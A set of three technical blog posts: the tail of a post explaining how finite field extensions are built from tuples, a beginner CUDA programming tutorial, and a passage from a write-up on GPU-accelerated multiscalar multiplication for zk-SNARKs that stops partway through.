    2. It extends the operations of the real numbers in the following way. For all real numbers $a$ and ${b,}$ the equality $(a,0)\cdot(b,0) = (ab, 0)$ should hold. This means we can think of the real numbers as sitting inside $\mathbb R^2$. They are those elements with a null second coordinate. And the new operation boils down to the usual one on this restricted set.</span></span></code></pre>
If we try to define the multiplication component-wise, we will need something else. That is, if we define $(a, b)\cdot(c, d) = (ac, bd)$, then the whole thing won’t be a field. For example, there won’t be a neutral element for multiplication (think about it!). It is not evident, but it turns out that a formula that works is the following:</p>
$$ (a, b) \cdot (c, d) := (ac - bd, ad + bc).$$</p>
Here the neutral element of the multiplication is $(1, 0)$. The set of pairs of real numbers $\mathbb R^2$ together with this multiplication and the component-wise addition is the field of complex numbers $\mathbb C$.</p>
Notation $a + bi$</h3>
Let’s play around with this to arrive at the more familiar form $a + bi$. This will also be key to understanding the usual constructions of finite fields out of the rings of polynomials.</p>
Since we can identify the real numbers inside $\mathbb R^2$ as the elements with a null second coordinate, we can abuse notation and write $a$ instead of $(a, 0)$. If we try to do the same with second coordinates, we need a way to distinguish them from the previous ones. So we write the elements of the form $(0, b)$ as $bi$. The $i$ means that it is not a real number. Now, the point $(a, b)$ is equal to $(a, 0) + (0, b)$. And with the new notation, it is written as $a + bi$. Notice that the notation $bi$ is consistent with our identification of $\mathbb R$ inside $\mathbb R^2$ and the multiplication rule. What we mean is that $bi$ is equal to $b\cdot i$ when we think $b$ as being $(b, 0)$ and $i$ as being the element $(0, 1)$. That is, $(b,0)\cdot(0, 1)=(0, b)$.</p>
Last but not least, note that $(0, 1) \cdot (0, 1) = (-1, 0)$. So under this notation, this is $i^2 = -1$.</p>
So why do we prefer the $a + bi$ notation over the $(a, b)$ one? I can think of a few reasons. It is more explicit that we want to think of the real numbers as sitting inside the complex numbers. It is also handier since it does not involve all the parenthesis. But it is just a notation.</p>
The takeaway is that complex numbers are a field constructed from real numbers by adding more coordinates. The same process creates all the finite fields. The difference is that we start from the fields $\mathbb F_p$ instead of $\mathbb R$.</p>
Wait, what about other extensions of the real numbers?</h4>
Now that we have the complex numbers $\mathbb C:= \mathbb R^2$ constructed as before, we could try to perform the same process and define a multiplication on the pairs of complex numbers $\mathbb C^2$ that together with addition component-wise is again a field.</p>
Another thing we could do is start from the real numbers again, but this time add three or more copies of it. That is, try to define a multiplication on triplets of real numbers $(a,b,c)$ to form a field.</p>
Both of these will need to be changed. This is called the Frobenius theorem</a>. It states that the best we can do is to define a non-commutative multiplication on $\mathbb C^2$ so that it won’t be a field. It is called the quaternions</em>. It is a fascinating object with many applications, for example, in computer graphics, to deal with rotations.</p>
The good news is that both constructions will work in the land of finite fields!</p>
Binary strings of length $2$</h2>
Let’s start simple. Consider $\mathbb F_2$. It has only two elements</p>
$$\mathbb F_2 = \{0, 1\}$$</p>
The addition and multiplication rules have $0$ as the neutral element for addition, $1$ as the neutral element for multiplication, and $1+1$ equals $0$. The addition is the usual XOR on the set of bits. This will be our building block. The field $\mathbb F_2$ will play the role of the real numbers in the previous section.</p>
Let us now add one more coordinate and consider the set of all binary strings of length $2$. So our set now is ${ (0,0), (0,1), (1,0), (1,1)}$. We will call this set $\mathbb F_2^2$ for now. We want to find a multiplication rule on $\mathbb F_2^2$ just like in the case of complex numbers. The addition on is the component-wise addition of $\mathbb F_2$</p>
$$(a,b) + (c, d) = (a+b, c+d).$$</p>
So for example $(1,1) + (0,1) = (1, 0)$. This is again the XOR but now on strings of length $2$. The challenge is again to come up with a multiplication rule.</p>
Let’s try to reverse-engineer it. Assume it is somehow defined and has all the properties we want. Essential to what follows is that we also require the multiplicative neutral element to be $(1, 0)$. This is the $1$ in $\mathbb F_2$ under its usual identification as the elements with null second coordinate.</p>
Let’s find out what would be $(0,1)\cdot(0,1)$. It surely is one of the elements of $\mathbb{F}_2^2$. So there are only four possible choices. It cannot be $(0,1)\cdot(0,1)=(0,0)$, otherwise we would get $(0, 1) = (0,0)$. This is the property we mentioned in the first section of this post: in a field, if $x\cdot x$ equals the neutral element of the addition $0$, then $x = 0$. Here the neutral element is $(0,0)$ because we are in $\mathbb F_2^2$ with the component-wise addition.</p>
Another possibility is that $(0,1)\cdot(0,1) = (1,0)$, then we could do the following reasoning.

\[ \begin{align} (1,1)\cdot(1,1) &= ((1,0) + (0,1))\cdot((1,0) + (0,1)) \newline

&= (1,0)\cdot(1,0) + 2(1,0)\cdot(0,1) + (0,1)\cdot(0,1) \newline

&= (1,0)\cdot(1,0) + (0,1)\cdot(0,1) \newline

&= (1,0) + (1,0) \newline

&= (0,0) \end{align} \]

This is bad for the same reason, we got $(1,1)\cdot(1,1) = (0,0)$ but $(1,1)$ is different from $(0,0)$.

So we are left with only two options for the result of $(0, 1)\cdot(0, 1)$. Either $(0,1)\cdot(0,1)$ is equal to $(1,1)$ or it is equal to $(0, 1)$. But a similar argument to the ones we gave rules out $(0, 1)$. And so, the only possible candidate is

$$(0, 1)\cdot(0, 1) = (1, 1)$$</p>
With this fact, we can construct the rest of the multiplication table. For example

$$(1,1)\cdot(1,1) = (1,0)\cdot(1,0) + (0,1)\cdot(0,1) = (1,0) + (1,1) = (0,1).$$</p>
And this works fine. Although not evident at first sight, it satisfies all the properties we want. The proof is easy but tedious now that there’s a candidate for the multiplication rule. We would have to go through all the properties and verify that they are satisfied (this is a finite amount of checks).</p>
Notation</h4>
Let’s introduce a notation with the same spirit as the complex numbers’ $a + bi$ notation. Similar to that case, let’s use the identification of $\mathbb F_2$ inside $\mathbb F_2^2$ and write $0$ and $1$ to mean $(0, 0)$ and $(1, 0)$. Now instead of the symbol $i$ as with the complex numbers let’s use $x$ to mean $(0, 1)$. There’s no real reason for it. Just that $i$ is highly associated with complex numbers, we want to emphasize that this is not that field. So now we have</p>
$$(0,0) = 0 + 0x = 0$$

$$(1, 0) = 1 + 0x = 1$$

$$(0, 1) = 0 + 1x = x$$

$$(1,1) = 1+1x = 1 + x$$</p>
And using the multiplication rule we just discovered, we obtain $x^2 = 1 + x$.

This equation is all we need to be able to multiply any two elements by repeatedly applying it whenever a power larger than $1$ appears. For example:

$$(1+x)x = x + x^2 = x + 1 + x = 1.$$</p>
The set $\mathbb F_2^2$ with this addition and multiplication has its symbol: it is denoted $\mathbb F_4$ and is called the field with four elements</em>.</p>
Binary strings of length $3$</h2>
The same process can be done with triplets $(a,b,c)$ of elements of $\mathbb F_2$. The elements of this set are $(0,0,0), (1,0,0), (0,1,0),(1,1,0)$, etc. It has $8$ elements, and we will denote it by $\mathbb F_2^3$. We have the component-wise addition

$$(a,b,c) + (a’,b’,c’) = (a+a’, b+b’, c+c’)$$

We can play the same game as before and discover a multiplication rule on $\mathbb F_2^3$ such that it forms a field together with the component-wise addition. In this case, we can even find one such that $(0,1,0)\cdot(0,1,0) = (0,0,1)$. We are not going to show the whole process. You can try it out for yourself!</p>
Similar to the previous case, this field is denoted $\mathbb F_8$, and it’s the unique field with $8$ elements.</p>
Notation</h4>
We identify $\mathbb F_2$ in $\mathbb F_8$ as the elements with null second and third coordinates. That is, $\mathbb F_2$ is ${(0,0,0), (1,0,0)}$.</p>
Now that we have three coordinates, we need two new symbols, $x$ and $y$, to write an element $(a,b,c)$ as $a + bx + cy$. But, since $(0,1,0)\cdot(0,1,0)$ equals $(0,0,1)$, we have $x^2 = y$. So we need only one symbol and can write $(a,b,c)$ as $a + bx+ cx^2$.</p>
If you construct the multiplication rule as in the case of binary strings of length $2$ you’ll find that $(0,1,0)\cdot(0,0,1) = (1,1,0)$. With this notation, this is $x^3 = 1 + x$. Similar to the previous case. This equation is all we need to multiply elements. For example</p>
$$(1 + x^2)(1 + x) = 1 + x + x^2 + x^3 = 1 + x + x^2 + 1 + x = x^2.$$</p>
General case!</h2>
Suppose we start with $\mathbb F_p$, where $p$ is some prime number. We can consider the set of tuples $(a_0, a_1, \dots, a_{n-1})$, all of the same length $n$, and call that set $\mathbb F_{p^n}$. In there, we have the component-wise addition. A theorem states that there always exists a multiplication rule on $\mathbb F_{p^n}$ such that it forms a field! Moreover, all multiplication rules are essentially the same. And so this means that there is a unique field of $p^n$ elements.</p>
Everything we showed for the binary strings of length $2$ and $3$ works here. We can write every element $(a_0, a_1, \dots, a_{n-1})$ as

$$a_0 + a_1x + a_2x^2 + \cdots + a_{n-1}x^{n-1}$$</p>
This notation is consistent with the multiplication rule, just like before. Also, there will be an equality of the form $x^n = b_0 + b_1x + \cdots + b_{n-1}x^{n-1}$ for some elements $b_i$ in $\mathbb F_p$.</p>
And every finite field is of this form!</p>
Towers of fields</h3>
The same works if we use any finite field $F$ as a building block. For example, we could start from $F = \mathbb F_8$. We can consider tuples $(a_0, \cdots, a_{n-1})$ of elements of $F$, and everything follows the same. There will always be a multiplication rule on $F^n$, making it a field. This is useful for constructing large extensions in small steps.</p>
Say for example we need to work with $\mathbb F_{p^{12}}$, the field with $p^{12}$ elements (for some prime number $p$). We could construct it from scratch by finding a multiplication rule on $\mathbb F_p^{12}$, the set of tuples of length $12$ elements of $\mathbb F_p$.

Another approach is as follows. Construct first the field $\mathbb F_{p^6}$ of $p^6$ elements. Then consider tuples $(a,b)$ with $a,b \in \mathbb F_{p^6}$. There is a multiplicative rule on that set of tuples, making it a field. That will be $\mathbb F_{p^{12}}$. These are called field towers and are a common way of constructing finite fields.</p>
The case of $\mathbb F_{p^{12}}$ is particularly interesting when working with the BLS12-377 or BLS12-381 curves. It is the field where all the points relevant to the pairings are defined.</p>
The set of bytes</h2>
Note that $\mathbb F_{256}$ is the set of all possible bytes. Its elements are tuples $(a_0, a_1,\dots, a_7)$ of elements of $\mathbb F_2$. We denote them by $a_0 + a_1x + a_2x^2 + \cdots + a_7x^7$. Here the equation is $x^8 = x^4 + x^3 + x + 1$.</p>
The Advanced Encryption Standard</a> (AES) uses this field as part of the block cipher!</p>
Summary</h2>
In the same way that complex numbers are just pairs of real numbers, field extensions of finite fields are just tuples of elements of some $\mathbb F_p$. It is not evident how to come up with the multiplication rule, but mathematicians have proved that it always exists, and the resulting field is essentially unique in a rigorous way we are not mentioning here. Field extensions are essential in many proving systems, especially those relying on Kate-Zaverucha-Goldberg (KZG) commitments.</p>


CUDA've been faster: learning CUDA from scratch
Unknown — Mon, 23 Jan 2023 00:00:00 +0000
Practical CUDA</h1>
CUDA is a parallel computing platform and programming model developed by NVIDIA for general computing on graphical processing units. We can use it to accelerate expensive computations, distributing the load over several processors. For example, in some zk-SNARKs</a>, we have to calculate a multiscalar multiplication</a>, which involves summing lots of points on an elliptic curve</a> (for example, 100,000,000), \( \sum a_k P_k\), where \( P_k \) are points on the curve and \( a_k \) are positive integers. We can also use CUDA for other problems where the task is highly parallelizable, such as solving differential equations, performing fast Fourier transforms, sorting elements, etc.</p>
CUDA is also widely used in Machine Learning algorithms, especially in those involving Deep Learning. It is also commonly found in game engines, image processing, and simulations for scientific purposes.</p>
In GPU-accelerated applications, the sequential part of the workload runs on the CPU, while processing large blocks of data runs on thousands of GPU cores in parallel. GPUs are optimized to run that kind of work! The overall philosophy is that the different cores run independently the same set of instructions in parallel (The SIMT or S</strong> ingle I</strong> nstruction, M</strong> ultiple T</strong> hread model).</p>
An excellent introduction to the CUDA programming model can be found here</a>.</p>
In this post, we will focus on CUDA code, using google colab to show and run examples. But before we start with the code, we need to have an overview of some building blocks.</p>
Building blocks</h2>
With CUDA, we can run multiple threads in parallel to process data. These threads are grouped in different processing units with their data-sharing and synchronization primitives.</p>
Logical processing units</h3>
The most fundamental building block of our application is the thread. Threads are then grouped into Warps</strong> , which are grouped into Blocks</strong> which are finally contained in a Grid</strong>.</p>
Depending on our algorithms, warps can be ignored, or be used to further optimize our application, as we will see later.</p>
At the moment of this post, each warp has 32 threads, and each block has 1024 threads or 32 warps.</p>
</p>
Physical processing units and memory</h3>
Blocks are run in Streaming Multiprocessors</strong>. Each streaming multi-processor has 8 CUDA Cores</strong> *. These cores can also be called Shaders or Streaming Processors.</p>
A busy multi-processor executes a warp, with their instructions running in parallel. Since warp threads are running in the same multi-processor, they can exchange information via Registers</strong> in a speedy way. This is useful since, after having our application running in as many threads as possible, the method to improve our performance is reducing memory access.</p>
Now that we have introduced registers, the next question we can ask is how do we share information between warps and between blocks? Let’s go upwards through the memory hierarchy.</p>
Each Streaming Multiprocessor has an SRAM</strong>. Its size depends on the graphic card. For example, in a V100, it is 128 KiB, and 192 KiB in an A100.</p>
This SRAM has a double purpose. First, it is used as an L1 cache</strong> in a way that is transparent to the programmer. A secondary use is as Shared Memory</strong>. This shared memory enables the programmer to share data inside a block in a fast manner.</p>
Since the SRAM has two functionalities, CUDA allows the programmer to define how much of the SRAM can be used as an L1 cache and how much as Shared Memory.</p>
Finally, we have Global Memory</strong>. This memory is the one we see in the specifications of graphic cards as GPU Memory and the one allocated with cudaAlloc(). Global Memory allows us to share data between thread blocks seamlessly.</p>
As tends to happen with hardware, operations become more expensive as we move to larger memories.</p>


image fromCuda Refresher - Nvidia blog</a></em></p>
*Nvidia has also released a new kind of cores, called Tensor Cores, for their Tensor Cores GPUs. These cores can run a small matrix multiplication of floating points in mixed precision as a native operation to further optimize machine learning algorithms</em></p>
Programming in CUDA</h2>
Starting - Simple array addition</h3>
We will start by parallelizing some elementary operations and using only global memory. Let’s start making a program that adds two arrays.</p>
Before we start, there are some standard procedures we need to do:</p>
    * For each function or kernel to use in the device, we need to define the following: </span></span>
      * How many blocks do we use?</span></span>
      * How many threads do we include per block?</span></span>
      * How are the blocks indexed?</span></span>
    * We need to allocate and copy data to the device</span></span></code></pre>
Picking the best parameters for the kernel is a topic of its own, but it’s good to keep in mind that the number of threads per block should be a multiple of the number of threads per warp, 32.</p>
Lastly, we need to decide how the blocks are indexed. We can set them to be accessed as a 1, 2, or 3-dimensional array. We are then picking between a typical array, a matrix, or a cube.</p>
It is just an index for the device, and it does not matter. But it is helpful for the programmer to pick something related to the problem being solved. If we add arrays, one dimension is suitable; if we are processing images, 2 is the best pick; and, if we are working with 3d models, it makes sense to use 3-dimensional matrices.</p>
In our case, we will define the following dimensions:</p>
dim3 threadsPerBlock(128);</span></span>
dim3 numBlocks(1024*1024);</span></span></code></pre>
If we wanted a 2d array, we could do</p>
dim3 threadsPerBlock(128);</span></span>
dim3 numBlocks(1024,1024);</span></span></code></pre>
Now, we also need to allocate some memory in our device and copy the arrays we want to add.</p>
Let’s assume we want to add two arrays of bytes, array1, and array2, with a size of AMOUNT_OF_ELEMENTS. Then we can reserve bytes for the two arrays and a result with:</p>
char* array1_in_device;</span></span>
char* array2_in_device;</span></span>
char* result_in_device;</span></span>
</span>
cudaMalloc(&array1_in_device, AMOUNT_OF_ELEMENTS);</span></span>
cudaMalloc(&array2_in_device, AMOUNT_OF_ELEMENTS);</span></span>
cudaMalloc(&result_in_device, AMOUNT_OF_ELEMENTS);    </span></span>
</span>
cudaMemcpy(array1_in_device, array1, AMOUNT_OF_ELEMENTS, cudaMemcpyHostToDevice);</span></span>
cudaMemcpy(array2_in_device, array2, AMOUNT_OF_ELEMENTS, cudaMemcpyHostToDevice);</span></span></code></pre>
Notice we do not need to store the result in a different place if we do not need the original arrays after the addition inside CUDA. And it is common for only one malloc to be used, and then the pointer is indexed with the data’s location. But since this is the first program, we will make it as simple as possible.</p>
Now, let’s focus on the algorithm.</p>
A simple non-CUDA code to solve this problem would look like this:</p>
for(int i = 0; i < MAX_ELEMENTS; i++)</span></span>
    solution_array[i] = a[i] + b[i]</span></span></code></pre>
If we assume we have one core for each index, we may delete the for and let each thread compute one addition. This is not always the case and makes for solutions that aren’t flexible enough. Then, we will need to use strides.</p>
Strides are nothing more than steps in a for loop to distribute the load between threads. For example, if we had a stride of 4, Thread 0 would process elements 0 3 7 11 …, Thread 1 would process elements 1 4 8 12 …, and so on.</p>
Instead of fixing the stride to one number, we can use CUDA primitives to make our algorithm flexible enough to work with different sizes of arrays and blocks. Our algorithm, using CUDA, would then become:</p>
__global__ void sum_arrays(char* array1, char* array2, char* result){</span></span>
</span>
    uint globalThreadID = blockIdx.x*blockDim.x+threadIdx.x;</span></span>
    uint stride = gridDim.x*blockDim.x;</span></span>
</span>
    for (int i = globalThreadID; i < AMOUNT_OF_ELEMENTS; i += stride){</span></span>
        result[i] = array1[i] + array2[i];</span></span>
    }</span></span>
}</span></span></code></pre>
Here global</strong> indicates it’s a function that runs on the device that can be called from the host.</p>
blockIdx is the block’s id, and blockDim is the number of elements in the block. ThreadIdx is the id of the thread inside the block. Notice then, by doing</p>
uint globalThreadID = blockIdx.x*blockDim.x+threadIdx.x;</code></p>
we obtain a unique ThreadID, independent of the block, that’s useful to split the work.</p>
The stride is defined as the number of threads we have to split the work evenly.</p>
Finally, to call this function from the host, we use the following:</p>
sum_arrays<<<numBlocks, threadsPerBlock>>>(</span></span>
    array1_in_device, array2_in_device, result_in_device</span></span>
);</span></span></code></pre>
The complete code can be read and run by copying the following google colab</a>. We have also added some examples of a matrix addition to show how the indexing works with more dimensions.</p>
Host - Device parallelism</h3>
Let’s keep using the same sum_arrays() functions differently and check another scenario.</p>
Suppose we call our function in the device from the host; after that, we write operations for the CPU. What happens in this scenario? Is the code run, or does it wait for the device?</p>
To answer the first question, let’s take some measures.</p>
We will make a program that does a lot of work over a small array and then retrieve the data in two chunks. And we will also measure the time it takes to call the function to retrieve both pieces.</p>
Since the code is a bit long, we will leave it in the same google colab</a> we used before, so feel free to copy and run it by yourself.</p>
What happens, then?</p>
We can see the function call takes almost no time, and the memcpy of the second chunk goes fast too. In the middle of both functions, the first memcpy takes most of the time, almost 1000 times more than the second one! Yet, the operation is the same. What’s going on?</p>
The answer is kernels run concurrently with the host, and the program is only blocked when it needs the data. The memcpy is not taking that much time, but it’s the first function call that requires the result, so it has to wait for the device to finish.</p>
To make it more evident, we will make use of another primitive:</p>
cudaDeviceSynchronize();</span></span></code></pre>
With this function, all the time is spent waiting for the device, and both memcpy takes the same amount of time.</p>
And knowing we can run code both in the GPU and the CPU simultaneously, we can further optimize our intensive application.</p>
Multi-stream code</h3>
Knowing what happens when we launch a kernel and try to run code locally, we could ask the following question: What happens if we launch multiple kernels simultaneously? Can they run in parallel too? What about memory transfers?</p>
Let’s try to answer these questions.</p>
Kernels and memcpy functions run sequentially in their stream. In the case we have seen before, there wasn’t an explicit mention of the stream, so the default stream is used.</p>
But, we can create more streams that we can use, using cudaStreamCreate</code> and then assigning the kernels to the new streams.</p>
Let’s see an example with two kernels:</p>
cudaStream_t stream1, stream2;</span></span>
cudaStreamCreate(&stream1);</span></span>
cudaStreamCreate(&stream2);</span></span>
foo<<<blocks,threads,0,stream1>>>();</span></span>
foo<<<blocks,threads,0,stream2>>>();</span></span>
cudaStreamDestroy(stream1);</span></span>
cudaStreamDestroy(stream2);</span></span></code></pre>
With this, if one kernel is not enough to fully use the device, we can fill it up with many other tasks that we can run in parallel. If both kernels of the last example used 50% of the device, we would have full occupancy.</p>
Since we have many kernels running, it’s a good idea to use the async version of memcpy to start moving data as soon as it comes.</p>
For example:</p>
cudaMemcpyAsync(&results, &results_in_kernel1, AMOUNT_OF_ELEMENTS, cudaMemcpyDeviceToHost, stream1);</span></span>
cudaMemcpyAsync(&results, &results_in_kernel2, AMOUNT_OF_ELEMENTS, cudaMemcpyDeviceToHost, stream2);</span></span></code></pre>
Suppose the computation spends a lot of time transferring data between the device and the host. Async memory transfers can be done in parallel with kernel execution since the GPU supports transferring and computing at the same time.</p>
If you want more examples of this, we have written a complete example in the colab</a></p>
Synchronization and Events</h3>
How do we synchronize work?</h4>
Within the host code, we can use different levels of synchronization. From more to less synchronization, some API calls we can use are:</p>
    * We can synchronize everything using `cudaDeviceSynchronize()`, which blocks the host until all issued CUDA calls are complete;</span></span>
    * we can synchronize concerning a specific stream using `cudaStreamSynchronize(stream)`, which blocks the host until all issued CUDA calls in `stream` are complete;</span></span>
    * Or we can synchronize hosts or devices more selectively using **events**.</span></span></code></pre>Events</h4>
CUDA events provide a mechanism to signal when operations have occurred in a stream. They are helpful for profiling and synchronization.</p>
Events have a boolean state: “Occurred” (which is the default state) or “Not Occurred”.</p>
Managing events and synchronizing streams</h4>
The most common way to create, delete and enqueue events are:</p>
    * `cudaEventCreate(&event)` creates an `event`;</span></span>
    * `cudaEventDestroy(&event)` destroys an `event`;</span></span>
    * `cudaEventRecord(&event, stream)`</span></span>
      * sets the `event` state to "Not Occurred",</span></span>
      * enqueues the `event` into a `stream` and</span></span>
      * `event` state is set to occur when it reaches the front of the `stream`.</span></span></code></pre>
How can we make sure that certain events have occurred before continuing execution?</p>
    * `cudaEventQuery(event)` returns `CUDA_SUCCESS` if `event` has occurred.</span></span>
    * `cudaEventSynchronize(event)` blocks the host until `event` has occurred.</span></span>
    * `cudaStreamWaitEvent(stream, event)`</span></span>
      * blocks all launches on `stream` after this call until `event` occurs</span></span>
      * does not block the host.</span></span></code></pre>Summary</h2>
CUDA allows us to speed up expensive calculations by distributing the load among GPUs. To make the best use of these capabilities, we need to rethink how we carry out our calculations, looking for algorithms that can be easily parallelized (such as the fast Fourier transform). In this post, we reviewed the basics of CUDA, what are the threads, and warps and how to manage and synchronize events. GPUs can offer tools to improve proving and verification times in zk-SNARKs, opening the door to many exciting applications. In future posts, we will cover more advanced topics of CUDA.</p>


ZPrize: eyes on the prize
Unknown — Mon, 23 Jan 2023 00:00:00 +0000
Introduction</h1>
This post contains a summary of different approaches to optimize multiscalar multiplication with CUDA, as presented for ZPrize</a>. This is an important calculation in certain proving systems</a> (zk-SNARKs), where it is necessary to add lots of points over an elliptic curve</a>. These large sums can be broken down into smaller ones, each of which can be calculated in parallel by a processor, making the use of CUDA ideal to speed it up considerably. A short introduction to CUDA can be found here</a>. The results of the ZPrize are promising, leading to more than 2x speed up; and the good news does not stop there, since each solution introduces different tricks and strategies. Below you will find an overview of some solutions and the links to each repo.</p>
Table of Contents</h2>
    * Goal</span></span>
    * Pippenger's algorithm</span></span>
    * Base algorithm</span></span>
    * Speakspeak's submission</span></span>
    * 6block's submission</span></span>
    * Mike Voronov and Alex Kolganov's submission</span></span>
    * MatterLabs's submission</span></span>
    * Yrrid's submission</span></span></code></pre>Goal</h2>
Given $n\in\mathbb{N}$, elliptic curve points $P_1, \dots, P_n$ and scalars $k_1, \dots, k_n$ in a finite field, compute $$P=\sum_{i=1}^nk_iP_i$$</p>
where the summation is understood in terms of ordinary elliptic curve addition</a>.</p>
The number of points is related to the number of constraints needed to represent the computation (which can be larger than 100,000,000). This calculation appears, for example, when we want to compute the commitment of a polynomial \( a_0+a_1x+a_2x^2+…a_dx^d \) using the Kate-Zaverucha-Goldberg (KZG) commitment scheme.</p>
Pippenger algorithm</h2>
Let $\lambda$ be the number of bits needed to store the scalars, and let $s$ be an integer between $1$ and $\lambda$. Denote by $\lceil \lambda/s \rceil$ the ceiling of $\lambda/s$, that is the least integer number greater than or equal to $\lambda/s$.</p>
Write each scalar $k_i$ in base $2^s$

$$k_i = \sum_{j=0}^{\lceil \lambda/s \rceil-1}m_{i,j}(2^{s})^j,$$

where $0 \leq m_{i,j} < 2^s$. Then</p>
$$\sum_{i=1}^n k_iP_i = \sum_{i=1}^n\sum_{j}m_{i,j}2^{sj}P_i = \sum_{j=0}^{\lceil \lambda/s \rceil-1}2^{sj}(\sum_{i=1}^n m_{i,j}P_i).$$</p>
Let us rewrite the inner sum differently. For each $1 \leq m < 2^s$ we can group all the terms of the inner sum that have $m_{i,j}=m$ and write</p>
$$\sum_{i=1}^nm_{i,j}P_i = \sum_{m=1}^{2^s-1}m(\sum_{i:,m_{i,j}=m}P_i)$$</p>
For the elements $m$ such that there is no $i$ with $m_{i,j}=m$ we interpret the sum $\sum_{i:, m_{i,j}=m}P_i$ as $0.$ This last step is called bucketing</em>.</p>
Putting it all together we obtain:

$$\sum_{i=1}^nk_iP_i = \sum_{j=0}^{\lceil \lambda/s \rceil - 1}2^{sj}\sum_{m=1}^{2^s-1}m\sum_{i:, m_{i,j}=m}P_i \tag{1}$$

Pippenger’s algorithm consists of computing the sums above starting from the innermost sum:</p>
(1) For each $j$ and $m$ compute $B_{j,m} := \sum_{i:,m_{i,j}=m}P_i$.</p>
(2) For each $j$ compute $G_j := \sum mB_{j,m}$ as follows. For all $1 \leq m < 2^s$ compute all the partial sums in descending order of the indices

$$S_{j,m} = B_{j,2^{s-1}} + \cdots + B_{j,m}.$$

Then compute the sum of the partial sums $S_{j,1} + \cdots + S_{j,2^s-1}$. This is equal to the sum $G_j$ we want.</p>
(3) Compute</p>
$$\sum_{j=0}^{\lceil \lambda/s \rceil-1}2^{sj}G_j.$$</p>
In pseudocode (extracted from this paper</a>):</p>
</p>
Base algorithm</h2>
The implementation is in algorithms/src/msm/variable_base/</code>. It is specific to the BLS12-377 curve. For this curve, we have $\lambda=253$.</p>
Aleo uses Pippenger’s algorithm with $s=1$. Equation $(1)$ reduces to

$$\sum_{i=1}^nk_iP_i = \sum_{j=0}^{\lambda - 1}2^{j}\sum_{i:, 1=m_{i,j}}P_i,$$

where $m_{i,j}$ are defined as before, but in this particular case $m_{i,j}$ coincides with the $j$-th bit of $k_i$.

Step 1 of Pippenger’s algorithm is trivial for this particular choice of $s$ and we get $G_j = B_{j,1}.$</p>
Parallelization strategy</h4>
CUDA parallelization is only used to modify step 2 as follows.</p>
(2) The goal is to compute $G_{j} = \sum_{i:, 1=m_{i,j}}P_i$ for all $j$. For that, the following steps are performed.</p>
(2.a) First, compute</p>
$$G_{j, a} = \sum_{\substack{i:, 1=m_{i,j},\ 128a\leq i < 128(a+1)}}P_i$$</p>
for all $0 \leq a < \lceil n/128 \rceil$ and all $j$ in parallel. That is done using $\lambda * \lceil n/128 \rceil$ threads.</p>
(2.b) Then for each $j$ compute $G_{j}$ by adding $G_{j,a}$ for all $a$. Each $j$ gets its thread and so this step requires $\lambda$ steps. Each thread adds $\lceil n/128\rceil$ elliptic curve points.</p>
Once all the $G_j$ are computed the rest of the Pippenger algorithm is executed in the CPU as in the previous section.</p>
Speakspeak</a></h2>
The article is “cuZK: Accelerating Zero-Knowledge Proof with A Faster Parallel Multi-Scalar Multiplication Algorithm on GPUs” and can be found here</a>. There are differences between what the paper describes and the actual implementation in the ZPrize submission.</p>
Parallelization strategy described in the paper</h4>
The strategy here is to change steps 1 and 2 of Pippenger’s algorithm to leverage GPU parallelization.</p>
We use the notation introduced in the Pippenger’s algorithm</strong> section. Let $t$ be the number of threads to be used.</p>
(1) compute $B_{j,m}$ as follows. For each $1 \leq j < \lceil \lambda / s \rceil$:</p>
(1.a) compute $m_{i,j}$ in parallel for all $i$ using all $t$ threads.</p>
(1.b) For each $0\leq l < t$ compute</p>
$$B_{j,m,l} := \sum_{\substack{i \text{ such that} \ ,m_{i,j}=m \ i \equiv l \text{ mod } t}}P_i$$</p>
Use all $t$ threads for it.</p>
(1.c) Let $M^{(j)}$ be the matrix with elliptic curve point entries such that $M_{m, l}^{(j)} = B_{j,m,l}$. This is a sparse matrix. Compute $B_{j,m} = M^{(j)}\cdot 1_t$, where $1_t$ is the vector of length $t$ with all entries equal to $1$. This can be done using existing parallel algorithms for sparse matrix-vector multiplications. Use all $t$ threads for it.</p>
(2) Compute all $G_j$ as follows. For all $0\leq j < \lceil \lambda / s \rceil$ do the following in parallel using $t’ := t/\lceil \lambda / s \rceil$ threads for each one.</p>
(2.a) For a given $j$, to compute $G_j = \sum mB_{j,m}$, split the sum in $t’$ even chunks and compute each one separately in its thread. That is, if we denote $\sigma=(2^s-1)/t’$, for each $0 \leq \xi < \sigma$ compute</p>
$$\sum_{m=\xi\sigma}^{(\xi+1)\sigma-1}mB_{j,m}.$$</p>
This can be done in the same way with the partial sum trick as in step 2 of Pippenger. There is an additional step needed in this case because the sequence of coefficient in the sum above is $\xi\sigma, \xi\sigma+1, \dots,$ instead of $1, 2, 3,\dots$. But that is easily fixed by adding $(\xi\sigma-1)$ times the largest partial sum.</p>
(2.b) Add all the chunks of the previous step. The result is $G_j$.</p>
Finally compute step 3 as in Pippenger.</p>
In pseudocode:</p>
</p>
Parallelization strategy from the implementation</h3>
The parallelization strategy in the actual code of the submission is quite simpler. There is no optimization with sparse matrix multiplications. However, there are several interesting things to note.</p>
    * Only the curve BLS12-377 is supported.</span></span>
    * The window size $s$ is chosen to be $21$. Since $\lambda = 253 = 12 * 21 + 1$, there are 13 windows, one of which has only binary scalars. This last window is treated differently from the other 12 windows. This is an odd choice given that $253 = 11 * 23$</span></span>
    * All the memory to store the inputs, the results, and all the partial results in between is allocated at the beginning. This needs quite a lot of memory. About 3.2GB of GPU RAM is only needed to store the scalars of all windows in the case of $2^{26}$ base points.</span></span>
    * For the most part (first 12 windows) kernels are launched with grids of blocks of $12$ columns and $M$ rows, where $M$ varies according to the task. Blocks on the other hand are one dimensional of size 32 and therefore warps and blocks coincide. Each column then handles computations relative to a specific window.</span></span>
    * There is intensive use of the `cub` [library](https://nvlabs.github.io/cub/index.html#sec1) for [sorting](https://nvlabs.github.io/cub/structcub_1_1_device_radix_sort.html), computing [run lengths](https://nvlabs.github.io/cub/structcub_1_1_device_run_length_encode.html), computing [cumulative sums](https://nvlabs.github.io/cub/structcub_1_1_device_scan.html) and [filtering](https://nvlabs.github.io/cub/structcub_1_1_device_select.html) lists.</span></span>
    * Most of the code is actually inside the `sppark/msm` directory. The original `sppark/msm` code has been modified.</span></span></code></pre>
The repository includes a walkthrough of the main parts of the code. Here is a summary.</p>
Let $n=2^{26}$ be the number of base points and let $N$ be $2 * Cores / (12 * 32)$, where $Cores$ is the number of cores of the GPU. Kernels will be usually launched with grids of 12 x $N$ blocks of 32 threads. The factor $2$ in $N$ makes sense at least at a step where a binary reduction algorithm is used to add up all points of an array of size $12 * N *32$.</p>
For step (1) of Pippenger.</p>
